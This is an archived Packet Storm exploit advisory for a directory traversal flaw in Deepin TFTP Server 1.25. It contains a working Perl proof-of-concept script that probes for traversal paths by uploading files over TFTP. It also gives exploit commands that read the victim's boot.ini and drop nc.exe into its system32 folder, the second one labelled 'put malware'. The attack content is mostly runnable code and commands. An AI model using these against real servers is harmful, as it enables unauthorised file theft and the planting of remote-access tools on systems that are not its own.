what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Deepin TFTP Server 1.25 Directory Traversal

Deepin TFTP Server 1.25 Directory Traversal
Posted Aug 26, 2010
Authored by demonalex

Deepin TFTP Server version 1.25 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 4cb56f5e478d834352c07a1ee5eab03eea9f276271155c58b190d2a97e1cc16d
Download | Favorite | View

Deepin TFTP Server 1.25 Directory Traversal

Change Mirror Download
Software : Deepin TFTP Server Directory Traversal Vulnerability
Software Version : v1.25
Vendor: Deepin.org 
Vulnerability Published : 2010-08-14
Vulnerability Update Time :
Status : 
Impact : Medium
Bug Description :
Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an FTP client.
Proof Of Concept :
****************************************************************
#!/usr/bin/perl -w
$|=1;
$target_ip=shift || die "usage: $0 \$target_ip\n";
@directory_traversal=(
'..\tmp.txt',
'..\..\tmp.txt',
'..\..\..\tmp.txt',
'..\..\..\..\tmp.txt',
'..\..\..\..\..\tmp.txt',
'..\..\..\..\..\..\tmp.txt',
'..\..\..\..\..\..\..\tmp.txt'
);
open(TMP, ">tmp.txt");
print TMP "tmp";
close(TMP);
foreach $dt_content (@directory_traversal){
  $dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
  print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
  print "$dt_it";
  if($dt_it=~m/^Transferred successfully/){
    print "Directory Traversal PAYLOAD is $dt_content.\n";
    print "Press [ENTER] Button to continue...\n";
    <STDIN>;
  }
  sleep(3);
}
print "Finish!\n";
exit(0);
****************************************************************
Exploit :
****************************************************************
#get sensitive file
c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini
#put malware
c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe
****************************************************************
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/Venustech.GZ Branch

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close